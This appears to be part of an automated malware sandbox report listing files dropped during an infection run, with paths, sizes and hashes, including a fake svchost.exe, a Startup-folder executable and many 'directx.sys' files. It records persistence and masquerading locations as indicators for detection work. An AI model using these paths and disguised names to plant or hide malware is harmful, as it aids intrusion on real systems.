0b390cd5a44a64296b592360b6b74ac66fb26026

SHA256
794ba0b949b2144057a1b68752d8fa324f1a211afc2231328be82d17f9308979

SHA512
80b2d105d2fac2e56b7ea9e1b56057e94ffe594c314ea96668d387ab120b24be580c58d68d37aca07273d3ce80f0d74f072102469f35cb02e2295817e1f16808

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\uhigdbf.exe

Filesize
898KB

MD5
eeecdefa939b534bc8f774a15e05ab0f

SHA1
4a20176527706aea33b22f436f6856572a9e4946

SHA256
3bdbca5f67754b92ff8d89e2db9f0ed3c5d50f8b434577866d18faa4c1fd343c

SHA512
3253eaebc2b14186131ac2170f8a62fe8271bf20ddf8b1024036fd1f9a00ea2d8d8b79646af9a8476d440374146bec3130591779b083905563146921b969b381

Download Submit
C:\Users\Admin\AppData\Local\Temp\Loli169.bat

Filesize
4.8MB

MD5
dc353b173d3d42ec63f9e226b5ed9197

SHA1
f4c6712054a18a8a82837eda63499cee9295d76a

SHA256
c450ff176d648d79a983c1bdaf67d138793b7edc56e19c956e81ac1f25114789

SHA512
0af471591aa71c8ccfaf96eca4de1b7ab3ccb6d3dc0812905d01566ca93513f191430dbe41e4b0dde03d2d6aeed9057fbd80f9f57518f0cf4e4c57fa2990c013

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat

Filesize
37B

MD5
28151380c82f5de81c1323171201e013

SHA1
ae515d813ba2b17c8c5ebdae196663dc81c26d3c

SHA256
bb8582ce28db923f243c8d7a3f2eccb0ed25930f5b5c94133af8eefb57a8231d

SHA512
46b29cba0dc813de0c58d2d83dc298fa677921fd1f19f41e2ed3c7909c497fab2236d10a9ae59b3f38e49cf167964ede45e15543673a1e0843266242b8e26253

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe

Filesize
453KB

MD5
135b0687503cb65f57e494eed9a6f551

SHA1
a4ed81f972c32d3170b5b33e67a41abbd6c1184a

SHA256
acc6551cf9cf2b8292f8f384467920fc633fdcdc4e5431794dd850ae66a8a457

SHA512
9253143306c6733180b0bea3c7463b4ca8d22a970a65eae05f766ced87ed973c0670867f69b8c72d318d93719da712276e64041a8b4269e818e41de113f6e22d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\fseawd.exe

Filesize
16KB

MD5
e7d405eec8052898f4d2b0440a6b72c9

SHA1
58cf7bfcec81faf744682f9479b905feed8e6e68

SHA256
b63a0e5f93b26ad0eeb9efba66691f3b7e7f51e93a2f0098bde43833f7a24cc2

SHA512
324507084bd56f7102459efe7b3c2d2560f4e89ed03ec4a38539ebb71bccdf1def7bc961c259f9b02f4b2be0d5e095136c9efcd5fc3108af3dc61d24970d6121

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarA23.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tmp141E.tmp

Filesize
2KB

MD5
1420d30f964eac2c85b2ccfe968eebce

SHA1
bdf9a6876578a3e38079c4f8cf5d6c79687ad750

SHA256
f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

SHA512
6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Treat.bat

Filesize
28KB

MD5
84e3f6bfcd653acdb026346c2e116ecc

SHA1
43947c2dc41318970cccef6cdde3da618af7895e

SHA256
00a0c805738394dfed356aae5a33ce80d8f751c3b5d7e09293817c07fbaeb9fd

SHA512
eeba8f5c0f9163bc38080ac7cfcc5babf9dfdf36b34b341416ca969b9f19cebb141f8b0d2e12e7c41d886eec36e23cf1525a7ce28785ad09154bc3db78ca0591

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI3162\python310.dll

Filesize
1.4MB

MD5
69d4f13fbaeee9b551c2d9a4a94d4458

SHA1
69540d8dfc0ee299a7ff6585018c7db0662aa629

SHA256
801317463bd116e603878c7c106093ba7db2bece11e691793e93065223fc7046

SHA512
8e632f141daf44bc470f8ee677c6f0fdcbcacbfce1472d928576bf7b9f91d6b76639d18e386d5e1c97e538a8fe19dd2d22ea47ae1acf138a0925e3c6dd156378

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI67882\importlib_metadata-7.0.1.dist-info\INSTALLER

Filesize
4B

MD5
365c9bfeb7d89244f2ce01c1de44cb85

SHA1
d7a03141d5d6b1e88b6b59ef08b6681df212c599

SHA256
ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508

SHA512
d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI78562\certifi\cacert.pem

Filesize
287KB

MD5
2a6bef11d1f4672f86d3321b38f81220

SHA1
b4146c66e7e24312882d33b16b2ee140cb764b0e

SHA256
1605d0d39c5e25d67e7838da6a17dcf2e8c6cfa79030e8fb0318e35f5495493c

SHA512
500dfff929d803b0121796e8c1a30bdfcb149318a4a4de460451e093e4cbd568cd12ab20d0294e0bfa7efbd001de968cca4c61072218441d4fa7fd9edf7236d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI78562\hexbytes-1.2.1.dist-info\WHEEL

Filesize
92B

MD5
43136dde7dd276932f6197bb6d676ef4

SHA1
6b13c105452c519ea0b65ac1a975bd5e19c50122

SHA256
189eedfe4581172c1b6a02b97a8f48a14c0b5baa3239e4ca990fbd8871553714

SHA512
e7712ba7d36deb083ebcc3b641ad3e7d19fb071ee64ae3a35ad6a50ee882b20cd2e60ca1319199df12584fe311a6266ec74f96a3fb67e59f90c7b5909668aee1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI78562\tzdata\zoneinfo\Africa\Conakry

Filesize
130B

MD5
796a57137d718e4fa3db8ef611f18e61

SHA1
23f0868c618aee82234605f5a0002356042e9349

SHA256
f3e7fcaa0e9840ff4169d3567d8fb5926644848f4963d7acf92320843c5d486e

SHA512
64a8de7d9e2e612a6e9438f2de598b11fecc5252052d92278c96dd6019abe7465e11c995e009dfbc76362080217e9df9091114bdbd1431828842348390cb997b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI78562\tzdata\zoneinfo\Africa\Djibouti

Filesize
191B

MD5
fe54394a3dcf951bad3c293980109dd2

SHA1
4650b524081009959e8487ed97c07a331c13fd2d

SHA256
0783854f52c33ada6b6d2a5d867662f0ae8e15238d2fce7b9ada4f4d319eb466

SHA512
fe4cf1dd66ae0739f1051be91d729efebde5459967bbe41adbdd3330d84d167a7f8db6d4974225cb75e3b2d207480dfb3862f2b1dda717f33b9c11d33dcac418

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI78562\tzdata\zoneinfo\Africa\Kigali

Filesize
131B

MD5
a87061b72790e27d9f155644521d8cce

SHA1
78de9718a513568db02a07447958b30ed9bae879

SHA256
fd4a97368230a89676c987779510a9920fe8d911fa065481536d1048cd0f529e

SHA512
3f071fd343d4e0f5678859c4f7f48c292f8b9a3d62d1075938c160142defd4f0423d8f031c95c48119ac71f160c9b6a02975841d49422b61b542418b8a63e441

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI78562\tzdata\zoneinfo\Africa\Lagos

Filesize
180B

MD5
89de77d185e9a76612bd5f9fb043a9c2

SHA1
0c58600cb28c94c8642dedb01ac1c3ce84ee9acf

SHA256
e5ef1288571cc56c5276ca966e1c8a675c6747726d758ecafe7effce6eca7be4

SHA512
e2fb974fa770639d56edc5f267306be7ee9b00b9b214a06739c0dad0403903d8432e1c7b9d4322a8c9c31bd1faa8083e262f9d851c29562883ca3933e01d018c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI78562\tzdata\zoneinfo\America\Curacao

Filesize
177B

MD5
92d3b867243120ea811c24c038e5b053

SHA1
ade39dfb24b20a67d3ac8cc7f59d364904934174

SHA256
abbe8628dd5487c889db816ce3a5077bbb47f6bafafeb9411d92d6ef2f70ce8d

SHA512
1eee8298dffa70049439884f269f90c0babcc8e94c5ccb595f12c8cfe3ad12d52b2d82a5853d0ff4a0e4d6069458cc1517b7535278b2fdef145e024e3531daad

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI78562\tzdata\zoneinfo\America\Toronto

Filesize
1KB

MD5
3fa8a9428d799763fa7ea205c02deb93

SHA1
222b74b3605024b3d9ed133a3a7419986adcc977

SHA256
815ab4db7a1b1292867d2f924b718e1bba32455ce9f92205db2feb65029c6761

SHA512
107a4dbb64107f781e3ed17b505baea28d4ca6683c2b49d146dda41c28ca3f9c307809ed938e4152011e199a7be6913de6f7b78cafe8ef300dc3034397945238

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI78562\tzdata\zoneinfo\Etc\Greenwich

Filesize
111B

MD5
e7577ad74319a942781e7153a97d7690

SHA1
91d9c2bf1cbb44214a808e923469d2153b3f9a3f

SHA256
dc4a07571b10884e4f4f3450c9d1a1cbf4c03ef53d06ed2e4ea152d9eba5d5d7

SHA512
b4bc0ddba238fcab00c99987ea7bd5d5fa15967eceba6a2455ecd1d81679b4c76182b5a9e10c004b55dc98abc68ce0912d4f42547b24a22b0f5f0f90117e2b55

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI78562\tzdata\zoneinfo\Europe\London

Filesize
1KB

MD5
d111147703d04769072d1b824d0ddc0c

SHA1
0c99c01cad245400194d78f9023bd92ee511fbb1

SHA256
676541f0b8ad457c744c093f807589adcad909e3fd03f901787d08786eedbd33

SHA512
21502d194dfd89ac66f3df6610cb7725936f69faafb6597d4c22cec9d5e40965d05dd7111de9089bc119ec2b701fea664d3cb291b20ae04d59bcbd79e681d07a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI78562\tzdata\zoneinfo\Europe\Oslo

Filesize
705B

MD5
2577d6d2ba90616ca47c8ee8d9fbca20

SHA1
e8f7079796d21c70589f90d7682f730ed236afd4

SHA256
a7fd9932d785d4d690900b834c3563c1810c1cf2e01711bcc0926af6c0767cb7

SHA512
f228ca1ef2756f955566513d7480d779b10b74a8780f2c3f1768730a1a9ae54c5ac44890d0690b59df70c4194a414f276f59bb29389f6fa29719cb06cb946ceb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI78562\tzdata\zoneinfo\Europe\Skopje

Filesize
478B

MD5
a4ac1780d547f4e4c41cab4c6cf1d76d

SHA1
9033138c20102912b7078149abc940ea83268587

SHA256
a8c964f3eaa7a209d9a650fb16c68c003e9a5fc62ffbbb10fa849d54fb3662d6

SHA512
7fd5c4598f9d61a3888b4831b0c256ac8c07a5ae28123f969549ae3085a77fece562a09805c44eab7973765d850f6c58f9fcf42582bdd7fd0cdba6cd3d432469

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI78562\tzdata\zoneinfo\PRC

Filesize
393B

MD5
dff9cd919f10d25842d1381cdff9f7f7

SHA1
2aa2d896e8dde7bc74cb502cd8bff5a2a19b511f

SHA256
bf8b7ed82fe6e63e6d98f8cea934eeac901cd16aba85eb5755ce3f8b4289ea8a

SHA512
c6f4ef7e4961d9f5ae353a5a54d5263fea784255884f7c18728e05806d7c80247a2af5d9999d805f40b0cc86a580a3e2e81135fdd49d62876a15e1ab50e148b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI78562\tzdata\zoneinfo\Pacific\Wallis

Filesize
134B

MD5
ba8d62a6ed66f462087e00ad76f7354d

SHA1
584a5063b3f9c2c1159cebea8ea2813e105f3173

SHA256
09035620bd831697a3e9072f82de34cfca5e912d50c8da547739aa2f28fb6d8e

SHA512
9c5dba4f7c71d5c753895cbfdb01e18b9195f7aad971948eb8e8817b7aca9b7531ca250cdce0e01a5b97ba42c1c9049fd93a2f1ed886ef9779a54babd969f761

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI78562\tzdata\zoneinfo\Pacific\Yap

Filesize
154B

MD5
bcf8aa818432d7ae244087c7306bcb23

SHA1
5a91d56826d9fc9bc84c408c581a12127690ed11

SHA256
683001055b6ef9dc9d88734e0eddd1782f1c3643b7c13a75e9cf8e9052006e19

SHA512
d5721c5bf8e1df68fbe2c83bb5cd1edea331f8be7f2a7ef7a6c45f1c656857f2f981adb2c82d8b380c88b1ddea6abb20d692c45403f9562448908637d70fa221

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI78562\tzdata\zoneinfo\UCT

Filesize
111B

MD5
51d8a0e68892ebf0854a1b4250ffb26b

SHA1
b3ea2db080cd92273d70a8795d1f6378ac1d2b74

SHA256
fddce1e648a1732ac29afd9a16151b2973cdf082e7ec0c690f7e42be6b598b93

SHA512
4d0def0cd33012754835b27078d64141503c8762e7fb0f74ac669b8e2768deeba14900feef6174f65b1c3dd2ea0ce9a73bba499275c1c75bcae91cd266262b78

Download Submit
C:\Users\Admin\AppData\Local\Temp\nswBF4B.tmp\System.dll

Filesize
10KB

MD5
b0a81b7b1bd6bbfe15e609df42791d22

SHA1
1b6f6726740b02aafdbe19cdc7b9dc5a2fdc4f75

SHA256
f9c47cf365f3607bc9abbce76839d02e6309a0d4389f1d2e0efb8d01e32459e9

SHA512
e105e7a3d4a908e59a8c8ab480d228bc4106e93f7fb833e6a5dea5ee0f2757c8617bda181324a059568d4b4c0b72b8628e60cf520c4f1b282305dbb34b5da194

Download Submit
C:\Users\Admin\AppData\Local\Temp\nswBF4B.tmp\nsExec.dll

Filesize
6KB

MD5
2fd10d2f8ae885cc7e34ff21703aef6c

SHA1
7a1862a0240684a423c2d988557ab5b306af85e1

SHA256
e0959b690f25160d590cfd7e2467bb9ce7e9d959663e7e203f502dce5246507d

SHA512
fde884c9e988dd04a0e6b1e14b295e911b3d835ca92ed1a7a4c8bdc05326446092d17f75013a4ec9dc3e05cb351fd42b87d9ed96df70d0d5e4c9048f5fb5a546

Download Submit
C:\Users\Admin\AppData\Local\Temp\nswBF4B.tmp\nsInstall.dll

Filesize
3.9MB

MD5
b0226b0a6420641a1ad20bd264ef0773

SHA1
d98ac9b823923991dad7c5bee33e87132616a5be

SHA256
77b9de16e105274d91379597dded837027a669d244138d7ca08274d89cf5fe43

SHA512
bdd25200b2c81eceba4206a404c58b15317f16fc748978848eb22a0db41e94153324915d0942277fccc490956b63bee5c148363f5982899e0a6a447531d212e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp74F1.tmp.bat

Filesize
151B

MD5
a64f740e9c7f54cae6c8493248a8f86e

SHA1
71071658998efca91adb551df28af44716963d3d

SHA256
abfd08562eb39ac92a5875e3980a0ff16b273aa8cb3c7cf9097b2eb0a05c9cb8

SHA512
f9a6ac01210ae0c3ed8e84aaf04e4fe4aab6847e2a92a870d29b7d343df8202080b374fab9aed22fc958e02d27ef4c8a2ae1ef411d9e53fe03eb3cf5567ee455

Download Submit
C:\Users\Admin\AppData\Local\TradeInsight Technologies\TradeWise.pif

Filesize
915KB

MD5
b06e67f9767e5023892d9698703ad098

SHA1
acc07666f4c1d4461d3e1c263cf6a194a8dd1544

SHA256
8498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb

SHA512
7972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2FN8VGBN7908L6ZW11Z2.temp

Filesize
7KB

MD5
c89d7ad516d936bee5171873c2524439

SHA1
9d58b5f53171e6ab83f449fb926c995a913f9951

SHA256
1ea4c9e351d290e663ed40775a84fa52910e73ce71425ca774c8819edabe0f9a

SHA512
6d317ebda47f6ac30114aca4b5c294d13e1e9503f0eeb1c692bc62e32aa539ccc4206bf2fdc4c5d48ab569e91018a4a8a3e60daa1884ae86c0530d967416ca4a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5EU68WS48QIWRXXXDGUB.temp

Filesize
7KB

MD5
74d522d5671e50b602ea8e88bfa84bc5

SHA1
19a3cbc2720a0024be5dfe957a3dc7879eeb19bd

SHA256
20f6d325f7aaab32f2296eff439e36dc0ff9b7f337a1a022a6e1e87622d8fc7a

SHA512
e87ac9d2ce211656851aa3e5086a4321f9db6937c432fde4629d1982bae15c2f7f39098ab783ce02a595f7c432d72c702b1d7cb3fa4d91b15ba292a02a511bba

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4a87b5397a2736773782f50e108b2da4.exe

Filesize
37KB

MD5
fb0bdd758f8a9f405e6af2358da06ae1

SHA1
6c283ab5e49e6fe3a93a996f850a5639fc49e3f5

SHA256
9da4778fce03b654f62009b3d88958213f139b2f35fe1bed438100fae35bdfbf

SHA512
71d3bd1c621a93bc54f1104285da5bf8e59bc26c3055cf708f61070c1a80ee705c33efd4a05acf3d3a90a9d9fca0357c66894dcb5045ab38b27834ff56c06253

Download Submit
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

Filesize
3.1MB

MD5
6a0bb84dcd837e83638f4292180bf5ab

SHA1
20e31ccffe1ac806e75ea839ea90b4c91e4322c5

SHA256
e119fe767f3d10a387df1951d4b356384c5a9d0441b4034ddf7293c389a410b4

SHA512
d0d61815c1ca73e4d1b8d5c3ea61e0572bfa9f6e984247b8e66c22e5591d61f766c6476c2686ce611917a56f2d4d8b8ddb4efcdbed707855e4190a2404eedcc5

Download Submit
C:\Users\Admin\AppData\Roaming\msvcp110.dll

Filesize
642KB

MD5
9bc424be13dca227268ab018dca9ef0c

SHA1
f6f42e926f511d57ef298613634f3a186ec25ddc

SHA256
59d3999d0989c9c91dae93c26499f5a14b837a0fe56e6fc29f57456f54a1f8a2

SHA512
70a1abb35bd95efc40af6653d5db2e155fab9a8575b7ae5b69ab3fbcd60925c66a675dac6cba57564a430e9b92f1a2ea9e912c4d7f356b82696ed77e92b52715

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.exe

Filesize
81KB

MD5
c066c8a13e7ceac132962c93ca00b081

SHA1
7689ef82fa93eab849cb3a476d0278569b472f86

SHA256
22a66e23726d04e04c4bab4980acd53ea19b60bd3ca3f48b18969339311307e7

SHA512
630f2fe8adeaa0ac5bd2d0f3120f65b153ae33767a5bf9eff9748fe4f0cd044a9e83eb6c7ae1b6160b81a80fb463eda85a26ebfe52c193a634db7829714a95ce

Download Submit
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe

Filesize
5.6MB

MD5
13b26b2c7048a92d6a843c1302618fad

SHA1
89c2dfc01ac12ef2704c7669844ec69f1700c1ca

SHA256
1753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256

SHA512
d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455

Download Submit
C:\Users\Admin\tbtnds.dat

Filesize
3KB

MD5
5cf14460f6e8c44dba9d38d2704e70e4

SHA1
d4e27535c7173e2bccb57597c0fa177b97b102fd

SHA256
e4e42d4ab632a5551dd9ac00c1ccc445861b7f42116cbd7d21e35049329cd7e6

SHA512
91dddc865e001e27589392e6c88500a2e66c9b88834a64e61bccc255203e4052545ed4811ca1a0237afbefad017392b803d04b4c95cb5d49bbed0a5894bc6e7b

Download Submit
C:\Windows\SysWOW64\directx\websetup\dsetup.dll

Filesize
93KB

MD5
984cad22fa542a08c5d22941b888d8dc

SHA1
3e3522e7f3af329f2235b0f0850d664d5377b3cd

SHA256
57bc22850bb8e0bcc511a9b54cd3da18eec61f3088940c07d63b9b74e7fe2308

SHA512
8ef171218b331f0591a4b2a5e68dcbae98f5891518ce877f1d8d1769c59c0f4ddae43cc43da6606975078f889c832f0666484db9e047782e7a0ae4a2d41f5bef

Download Submit
C:\Windows\SysWOW64\directx\websetup\dsetup32.dll

Filesize
1.5MB

MD5
a5412a144f63d639b47fcc1ba68cb029

SHA1
81bd5f1c99b22c0266f3f59959dfb4ea023be47e

SHA256
8a011da043a4b81e2b3d41a332e0ff23a65d546bd7636e8bc74885e8746927d6

SHA512
2679a4cb690e8d709cb5e57b59315d22f69f91efa6c4ee841943751c882b0c0457fd4a3376ac3832c757c6dfaffb7d844909c5665b86a95339af586097ee0405

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
6f95c49bdf7b7528b65ee88aca579be4

SHA1
d03b3cb398a2c25f50fd5e9cf92b59d1cf3a0754

SHA256
44eb778819d8d603fc3c887d6dc143082f25282262bf7bd6b12c722838a360a1

SHA512
d7828bd9dba53ba50c5f98821b303c70484f81e9ae1cc32c9a0fc10c2a43764fe961ee65f2c9c6275ba50c1fa05b2185df558d82a8344c0eabe78f7bc353062e

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
cbb11727040ac7695f092126382c46cd

SHA1
65de7ea9b476fce42896a408d8365bf5aff44e26

SHA256
3955653413ea26eec55b369a8f72e93a9f73afca444bc9d5c84df77d39da8445

SHA512
df51ab9d1e13a047ced6cc60328303791d8d4f6de19528098560b4eabad5ba52aa7c4b96cc009a31ca76bfe99ed0f18c36de1f676061349c6579086594bdcc9d

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
4c3eee1687b79b8fd28971f7c1d22f71

SHA1
9745e8f2b12d24f4b26f268be3f996a95fe29222

SHA256
17d2596ff0fcc5e5c670e1e6b9ece83a06c2eadc04221c023da879539422dca3

SHA512
b6921b56f8a9a784503d4dd3ff09ffe6ad2fdfb0fb0c6933c25c9f54ce6ea143d628301999035e1c73fd858d0ce8570c37c9f7291399a101a68005bfbde12fe3

Download Submit
C:\Windows\directx.sys

Filesize
47B

MD5
4f4d924d2584d145b5b6b9b4bad44fdb

SHA1
9ada6b02192a14219601e5f9d862dee7779083a4

SHA256
7293d0a3c14173bb9ca7f33ca33387b2e774980aadf6865ab315bc756d1f9432

SHA512
e0fb71d6c2f0d6cfa2647ebc3ba3aa7777c1a6f398da4d670a0853f26b0942590c00bd49f647a4ee6403b42fbba87f603dc12c047ab37b66dcecb40e39b08abf

Download Submit
C:\Windows\directx.sys

Filesize
49B

MD5
9cb8674048e1eb81111be9402991bf92

SHA1
8881d26a77ad5460f1099808cb4ae45a25b78c16

SHA256
255df049bc49201f518adb95e859d610bbead73afc16e237b1d611fd50867093

SHA512
1db01d1a9febb3b0e88aede8e0746cfffb82e9521af6558916557310f540b259e0f77685c2641221b6e7e1ad2af8201a7071adf0dccba4cad0bbebf8985a4b7a

Download Submit
C:\Windows\directx.sys

Filesize
53B

MD5
13426aac4abbd498165bdbf1bcbca346

SHA1
3987260670fd4d9aaf26183ea8cd12ce97a3067d

SHA256
9646a15357fd72ada4b40fee9e978865870a83a842182512851a7e6f847f3b26

SHA512
ee48ef42a9c893d81e4b1e5da297ddf15de085a93aa804846b31acef92d185fc4f97cfd47d7aa2c9b14e0381b8c49c4a149e163dbb2a2863f3f81b32734606b1

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
cee473735b021f0d88da255d5da01625

SHA1
66089e5c360883076fd6c62032afe9f1bc8539ab

SHA256
1c2966542ad5e3e7c2727c0a05ae8fbf079cb2082ae7358820434cd45bdae7c2

SHA512
a52767ab2099bd6db61a12df36818981760a186a29c4b96c5047ed87411ead5c09bcbc939bea5c0fd4455e04cba0218400609bf1e60ed0f940f068a740927657

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
a6859c16a44e7c604de145fb9719928e

SHA1
7d3ecf05f556abc42210d4f536647c26f5e3f1e1

SHA256
a443fd617c7740fcf10b2f333ace60440bae5b940b2a49d2ef5fd2aa7689944a

SHA512
de32cd465dc5dd56f2f6140ff2bcc0e621a7776368fc18c9bdf0ad4f7967b4c973db92b479db0ceb898a0535b0097dc6caea22469c19b85256ce67459136c622

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
53824bff04ca6da38896fd66e9e4e062

SHA1
7c7d8af422ec25060a933f32e012600804a8496a

SHA256
18492eb6ed9258482a7050d62a133be54a6465591babdbbfe71bc1c176cff6b7

SHA512
4ad554782e808ebe450572b02b3d8eb6e3b7b72dae7002d1e0514d387af7c766d4c46ba6207812e040a2b868bb088a8d3b9d2b5e2bc155729fe51c2612c99bd5

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
c0b10143454d77739a368e04e0f35df5

SHA1
f3af68a474210444d81d85902d20e1b358dee3cf

SHA256
2917e6960136a725e02b583e48084f2d01e6f067b0e0c48a903cb9e87cbcc084

SHA512
d7a195e2a204bb8735770e8b69ecaadd209b59f0f80548f19294301cc11b7f4e8b818d0fe4075faed3cc6012654afb0447057867bb4d2e96311bc9474ed6c01b

Download Submit
C:\Windows\directx.sys

Filesize
53B

MD5
e86df8ab91b93361ace8d269bf0cfd04

SHA1
c2facf14233781bc73c701d8d9d1f361a8f1b214

SHA256
98288e886d52067e31bb443e155eebc87b92c7d094c42357ac2097ae7d3264ef

SHA512
dfdf60ca05adba7194f5f4b6cdb104eb8a58edb10838f6c5255c6d2aad7e5cfe6f0c5cc11e41093164bb1e628445496fabbbc910af12e5dd46665463f50e7f65

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
7398708da3790090454af587a4fc04ac

SHA1
6f532ef49cf52153188e0b8804e3fe376bc202fd

SHA256
46c33197bfe9acc185615f9140b52b09d743a7548fe42bbdc6322f7a7d838e40

SHA512
f12fa5e91ee2c5e8d025cf04c5071710358a95cb3e9b4e4123bbacc3930eeea2757c388f334972dabc21bf65572a448ad157689cef1be07c05e02baa4e63e682

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
2338780ec1bc1f4b97424a1456262ba2

SHA1
2285ee977709dc1ace6ddcf6bb39e4abc00471d0

SHA256
73d0228c8aaeb6bcbd3d1cac2b2c480d6523eb5a6c9a752e6321bee7c60eba02

SHA512
01326a1e951c8b7550e55075ff32eda424954bec3148dd32f89ddfd91e859f24ab62de53b07f8e2f9e037a5038c1204c5e06b86ce27b58bf5729402b6625f9f1

Download Submit
C:\Windows\directx.sys

Filesize
49B

MD5
b5303c80e0c87990a1f26d4de374352b

SHA1
fe35818d83c706dc085f29b0e42c0060b4d4eed5

SHA256
15ac8b015f9dbcafdae2a145e22c8a87264cb1121fd45f05d4bbd2e710a28bf4

SHA512
3d6be9a9ead98a4a99c2af3bbefa616e8c84dc762b4a740845f20cac34825afd628449bd092bf7cd27c3443af99616d61f408bc834d9549235acfe2647d5273e

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
e0d1dd4a07b34a35744ce774880575be

SHA1
23d3005e62e60c217f40ee12a8a4278301723398

SHA256
79664e42a7f410e1888b29eaabfddd96ef7597513edf866cd8dde9c59a8e6fec

SHA512
68faca4df687d316d080a7fbe5833afcbce0529b11b2f77fc6ed3485435e135101e36a66f68efaec690da3eb234ce06b96bc008d6b99c26721031ee839eb3d54

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
9c46688c848b85135c91c681f0a1874e

SHA1
d916cd6e4d80d824d71ab069223e9b3c45d2ff1c

SHA256
42a344e1e54aa6bc69d20865ab561f65d029e7221006b9f712e72d0a5705b60a

SHA512
6b07e8fc694a6101add7197f60d4ab798cee077dc30ba9b348d0615c27391f59dc0d5cb0c660a98414a75b126d0919fe4c09369dd6afd9a950828d474b17f809

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
02aa749c7d21ef42697359aba874ecbb

SHA1
0e5ba563b113d5a475a0be3d7cd2eb67533d29d0

SHA256
6d081445202e460bd12fd65f03bd5629d5eaa9aa137b6b611e8fa850de05bf46

SHA512
a31d5aeba94f83b8fa5bee6bf6239c961017e6faabcc20d3bfad649fccf243ebd9168e3624d7c91ffb8df491e169645ecd952c4976f1a01577cc3d308dc1bd0b

Download Submit
C:\Windows\directx.sys

Filesize
52B

MD5
10db6ca749f754215cf3674e5231638b

SHA1
e57a2c7dbbe23158972de786eb1194dcf5928fa6

SHA256
83efb3ff77cb5067bc31a441ad48c8f2c2c05c69c1fc7d906be26bd11e4c92de

SHA512
2e4d7daf6d0b119e406c2490808d21d90be7253cce16c727b1d6dcff3b4509a2549f6138a36482469bda81092156b2a4d7f111ce1718de16e44afefa7a429353

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
11a49c0f18f64b3e9e376bd9359291f9

SHA1
7a4c9b6d382ee63a18b8b2a2e9b2498e3e0ec272

SHA256
70985877be0c2d7e315b086ea84db7fe1d9986b6749003cbbe8434fe7174bff4

SHA512
4e239acb4c06bf0b0bf4b3c8fc0d8d1b7daaaa421f99107f792f1763fc269826828023dee3b0e9117b3cde8a04dac165e1d3f8d229bce0a339da75ea8ae4e9a6

Download Submit
C:\Windows\directx.sys

Filesize
53B

MD5
5e9eccd672a420000cb32ec270161700

SHA1
ef5e5472e0d2d2f79f39d7b96ebb7c1acb835c3f

SHA256
5d4bc4a7cf2093db766e76d825e388308e1639bcd3dbf76189270178d4086a71

SHA512
8e0727b7d739e8b2260104b6bad9436abdbf153d1aff1bba67a0d12049e2bfc8c68f98419c47cb84ce8046ba3229d811bfb237329af7d07c24d6aa2b3a60785e

Download Submit
C:\Windows\directx.sys

Filesize
53B

MD5
f36f1fc609595c00a746c70df14fdf87

SHA1
